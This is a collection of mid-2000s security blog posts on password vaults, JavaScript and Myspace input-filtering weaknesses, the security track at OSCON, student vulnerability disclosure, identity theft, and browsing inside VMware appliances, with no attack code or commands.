Once again, Scott Adams cuts to the heart of the matter. Here’s a great explanation of what’s what with electronic voting machines.
In my earlier posts on passwords, I noted that I approach on-line password “vaults” with caution. I have no reason to doubt that the many password services, secure email services, and other encrypted network services are legitimate. However, I am unable to adequately verify that such is the case for anything I would truly want to protect. It is also possible that some employee has compromised the software, or a rootkit has been installed, so even if the service was designed to be legitimate, it is nonetheless compromised without the rightful owners knowledge.
For a similar reason, I don’t use the same password at multiple sites—I use a different password for each, so if one site is “dishonest” (or compromised) I don’t lose security at all my sites.
For items that I don’t value very much, the convenience of an online vault service might outweigh my paranoia—but that hasn’t happened yet.
Today I ran across this:
MyBlackBook [ver 1.85 live] - Internet’s First Secure & Confidential Online Sex Log!
My first thought is “Wow! What a way to datamine information on potential hot dates!”
That quickly led to the realization that this is an *incredible* tool for collecting blackmail information. Even if the people operating it are legit (and I have no reason to doubt that they are anything but honest), this site will be a prime target for criminals.
It may also be a prime target for lawyers seeking information on personal damages, divorce actions, and more.
My bottom line: don’t store things remotely online, even in “secure” storage, unless you wouldn’t mind that they get published in a blog somewhere—or worse. Of course, storing online locally with poor security is not really that much better…..
You know, I would feel a lot better about this technology if someone had fixed basic problems with the way browsers handle JavaScript, about JavaScript policy specifications and compliance testing, and if there were good, usable and mature static analysis tools that could detect cross-site scripting vulnerabilities (Pixy by Jovanovic et al. comes to mind as a promising open source tool), and if people used them. These problems have been known for a long time.
So, tell me again; do you really want to build castles on that foundation? It sounds like a bad idea to me. We can always hope that eventually, AJAX horror stories (to come) will drive security improvements, but I’d rather not be in the crowd of early sufferers. At least, please do me a favor and honor the principle of graceful degradation, so that if I visit your web site with JavaScript turned off, I can still make some use of it.
OSCON 2006 was a lot of fun for a lot of reasons, and was overall a very positive experience. There were a few things that bugged me, though.
I met a lot of cool people at OSCON. There are too many folks to list here without either getting really boring or forgetting someone, but I was happy to put a lot of faces to names and exchange ideas with some Very Smart People. The PHP Security Hoedown BOF that I moderated was especially good in that respect, I thought. There were also a lot of good sessions, especially Theo Schlossnagle’s Big Bad PostgreSQL: A Case Study, Chris Shiflett’s PHP Security Testing, and the PHP Lightning Talks (“PHP-Nuke is a honeypot” - thank you for the best quote of the convention, Zak Greant).
On the other hand, I was very surprised that the Security track at OSCON was almost nonexistent. There were four sessions and one tutorial, and for a 5-day event with lots of sessions going on at the same time, that seems like a really poor showing. The only other tracks that has security-related sessions were:
which leaves us with the following tracks with no security-oriented sessions:
I can certainly think of a few pertinent security topics for each of these tracks. I’m not affiliated with O’Reilly, and I have no idea whether the OSCON planners just didn’t get very many security-related proposals, or they felt that attendees wouldn’t be interested in them. Either way, it’s worrisome.
Security is an essential part of any kind of development: as fundamental as interface design or performance. Developers are stewards of the data of their users, and if we don’t take that responsibility seriously, all our sweet gradient backgrounds and performance optimizations are pointless. So to see, for one reason or another, security relegated to steerage at OSCON was disappointing. I hope O’Reilly works hard to correct this next year, and I’m going to encourage other CERIAS folk like Pascal Meunier and Keith Watson to send in proposals for 2007.
Myspace, the super-popular web site that your kid uses and you don’t, was once again hit by a worm, this time utilizing Macromedia Flash as its primary vector. This was a reminder for me of just how badly Myspace has screwed up when it comes to input filtering:
Even if they can plug these holes, it’s unlikely that anything short of a full rewrite/refactorization of their profile customization system can ever be considered moderately secure.
So will Myspace get their act together and modify their input filtering approaches? Very unlikely. A large portion of Myspace’s appeal relies upon the customization techniques that allow users to decorate their pages with all manner of obnoxious flashing, glittery animations and videos. Millions of users use cobbled-together hacks to twist their profiles into something fancier than the default, and a substantial cottage industry has sprung up around the subject. Doing proper input filtering means undoing much of that.
Even if relatively secure equivalent techniques are offered, Myspace would certainly find themselves with a disgruntled user base that’s more likely to bail to a competitor. That’s an incredibly risky move in the social networking market, and will likely lead Myspace to continue plugging holes rather than building a dam that works.
This is why you can’t design web applications with security as an afterthought. Myspace has, and I think it will prove to be their biggest mistake.
I was involved in disclosing a vulnerability found by a student to a production web site using custom software (i.e., we didn’t have access to the source code or configuration information). As luck would have it, the web site got hacked. I had to talk to a detective in the resulting police investigation. Nothing bad happened to me, but it could have, for two reasons.
The first reason is that whenever you do something “unnecessary”, such as reporting a vulnerability, police wonder why, and how you found out. Police also wonders if you found one vulnerability, could you have found more and not reported them? Who did you disclose that information to? Did you get into the web site, and do anything there that you shouldn’t have? It’s normal for the police to think that way. They have to. Unfortunately, it makes it very uninteresting to report any problems.
A typical difficulty encountered by vulnerability researchers is that administrators or programmers often deny that a problem is exploitable or is of any consequence, and request a proof. This got Eric McCarty in trouble—the proof is automatically a proof that you breached the law, and can be used to prosecute you! Thankfully, the administrators of the web site believed our report without trapping us by requesting a proof in the form of an exploit and fixed it in record time. We could have been in trouble if we had believed that a request for a proof was an authorization to perform penetration testing. I believe that I would have requested a signed authorization before doing it, but it is easy to imagine a well-meaning student being not as cautious (or I could have forgotten to request the written authorization, or they could have refused to provide it…). Because the vulnerability was fixed in record time, it also protected us from being accused of the subsequent break-in, which happened after the vulnerability was fixed, and therefore had to use some other means. If there had been an overlap in time, we could have become suspects.
The second reason that bad things could have happened to me is that I’m stubborn and believe that in a university setting, it should be acceptable for students who stumble across a problem to report vulnerabilities anonymously through an approved person (e.g., a staff member or faculty) and mechanism. Why anonymously? Because student vulnerability reporters are akin to whistleblowers. They are quite vulnerable to retaliation from the administrators of web sites (especially if it’s a faculty web site that is used for grading). In addition, student vulnerability reporters need to be protected from the previously described situation, where they can become suspects and possibly unjustly accused simply because someone else exploited the web site around the same time that they reported the problem. Unlike security professionals, they do not understand the risks they take by reporting vulnerabilities (several security professionals don’t yet either). They may try to confirm that a web site is actually vulnerable by creating an exploit, without ill intentions. Students can be guided to avoid those mistakes by having a resource person to help them report vulnerabilities.
So, as a stubborn idealist I clashed with the detective by refusing to identify the student who had originally found the problem. I knew the student enough to vouch for him, and I knew that the vulnerability we found could not have been the one that was exploited. I was quickly threatened with the possibility of court orders, and the number of felony counts in the incident was brandished as justification for revealing the name of the student. My superiors also requested that I cooperate with the detective. Was this worth losing my job? Was this worth the hassle of responding to court orders, subpoenas, and possibly having my computers (work and personal) seized? Thankfully, the student bravely decided to step forward and defused the situation.
As a consequence of that experience, I intend to provide the following instructions to students (until something changes):
Edit (5/24/06): Most of the comments below are interesting, and I’m glad you took the time to respond. After an email exchange with CERT/CC, I believe that they can genuinely help by shielding you from having to answer questions from and directly deal with law enforcement, as well as from the pressures of an employer. There is a limit to the protection that they can provide, and past that limit you may be in trouble, but it is a valuable service.
This is a great blog posting: Security Absurdity: The Complete, Unquestionable, And Total Failure of Information Security. The data and links are comprehensive, and the message is right on. There is a tone of rant to the message, but it is justified.
I was thinking of writing something like this, but Noam has done it first, and maybe more completely in some areas than I would have. I probably would have also said something about the terrible state of Federal support for infosec research, however, and also mentioned the PITAC report on cyber security.
[posted with ecto]
A recent study by the US Justice Department notes that households headed by individuals between the ages of 18 and 24 are the most likely to experience identity theft. The report does not investigate why this age group is more susceptible, so I’ve started a list:
I’m sure there are many more contributing factors. What interests me is determining the appropriate role of the university in helping to prevent identity theft among this age group. Most colleges and universities now engage in information security awareness and training initiatives with the goal of protecting the university’s infrastructure and the privacy of information covered by regulations such as FERPA, HIPPA, and so on. Should higher education institutions extend infosec awareness campaigns so that they deal with issues of personal privacy protection and identity theft? What are the benefits to universities? What are their responsibilities to their students?
For educational organizations interested in educating students about the risks of identity theft, the U.S. Department of Education has a website devoted to the topic as does EDUCAUSE.
The results are in from the EDUCAUSE Security Task Force’s Computer Security Awareness Video Contest. Topics covered include spyware, phishing, and patching. The winning video, Superhighway Safety, uses a simple running metaphor, a steady beat, and stark visual effects to concisely convey the dangers to online computing as well as the steps one can take to protect his or her computer and personal information.
The videos are available for educational, noncommercial use, provided that each is identified as being a winning entry in the contest. In addition to being great educational/awareness tools, they should serve as inspiration for K-12 schools as well as colleges and universities.
According to the National Vulnerability Database (http://nvd.nist.gov), the number of vulnerabilities found every year increases: 1253 in 2003, 2343 in 2004, and 4734 in 2005. We take security risks not only by choosing a specific operating system, but also by installing applications and services. We take risks by browsing the web, because web sites insist on running code on our systems: JavaScript, Flash (ActionScript), Java, ActiveX, VBscript, QuickTime, and all the plug-ins and browser extensions imaginable. Applications we pay for want to probe the network to make sure there isn’t another copy running on another computer, creating a vector by which malicious replies could attack us.
Games refuse to install in unprivileged accounts, so they can run their own integrity checkers with spyware qualities with full privileges (e.g., WoW, but others do the same, e.g., Lineage II), that in turn can even deny you the capability to terminate (kill) the game if it hangs (e.g., Lineage II). This is done supposedly to prevent cheating, but allows the game companies full access and control of your machine, which is objectionable. On top of that those games are networked applications, meaning that any vulnerability in them could result in a complete (i.e., root, LocalSystem) compromise.
It is common knowledge that if a worm like MyTob compromises your system, you need to wipe the drive and reinstall everything. This is in part because these worms are so hard to remove, as they attack security software and will prevent firewalls and virus scanners from functioning properly. However there is also a trust issue—a rootkit could have been installed, so you can’t trust that computer anymore. So, if you do any sensitive work or are just afraid of losing your work in progress, you need a dedicated gaming or internet PC. Or do you?
Company VMWare offers on their web site the free download of VMWare player, as well as a “browser appliance” based on Firefox and Ubuntu Linux. The advantages are that you don’t need to install and *trust* Firefox. Moreover, you don’t need to trust Internet Explorer or any other browser anymore. If a worm compromises Firefox, or malicious JavaScripts change settings and take control of Firefox, you may simply trash the browser appliance and download a new copy. I can’t overemphasize how much less work this is compared to reinstalling Windows XP for the nth time, possibly having to call the license validation phone line, and frantically trying to find a recent backup that works and isn’t infected too. As long as VMWare player can contain the infection, your installation is preserved. Also hosted on the VMWare site are various community-created images allowing you to test various software at essentially no risk, and no configuration work!
After experiencing this, I am left to wonder, why aren’t all applications like a VMWare “appliance” image, and the operating system like VMWare player? They should be. Efforts to engineer software security have obviously failed to contain the growth of vulnerabilities and security problems. Applying the same solutions the same problems will keep resulting in failures. I’m not giving up on secure programming and secure software engineering, as I can see promising languages, development methods and technologies appearing, but at the same time I can’t trust my personal computers, and I need to compartmentalize by buying separate machines. This is expensive and inconvenient. Virtual machines provide us with an alternative. In the past, storing entire images of operating systems for each application was unthinkable. Nowadays, storage is so cheap and abundant that the size of “appliance” images is no longer an issue. It is time to virtualize the entire machine; all I now require from the base operating system is to manage a file system and be able to launch VMWare player, with at least a browser appliance to bootstrap… Well, not quite. Isolated appliances are not so useful; I want to be able to transfer documents from appliance to appliance. This is easily accomplished with a USB memory stick, or perhaps a virtual drive that I can mount when needed. This shared storage could become a new propagation vector for viruses, but it would be very limited in scope.
Virtual machine appliances, anyone?
Note (March13, 2006): Virtual machines can’t defend against cross-site scripting vulnerabilities (XSS), so they are not a solution for all security problems.